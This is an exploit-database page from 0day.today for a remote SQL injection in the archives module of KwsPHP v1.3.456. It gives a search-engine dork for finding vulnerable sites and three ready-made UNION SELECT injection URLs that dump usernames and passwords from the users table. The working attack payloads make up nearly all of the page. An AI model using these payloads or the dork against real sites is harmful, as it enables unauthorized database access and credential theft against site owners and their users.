[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KwsPHP Module Archives (id) Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2804
Category
web applications
Date add
02-04-2008
Platform
unsorted
==============================================================
KwsPHP Module Archives (id) Remote SQL Injection Vulnerability
==============================================================



##########################################
#
# KwsPHP v1.3.456 (archives)SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "index.php?mod=archives"
#
###########################################
EXPLOiT 1:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*

EXPLOiT 2:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/from/**/users/*

EXPLOiT 3:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*



###########################################



#  0day.today [2024-11-15]  #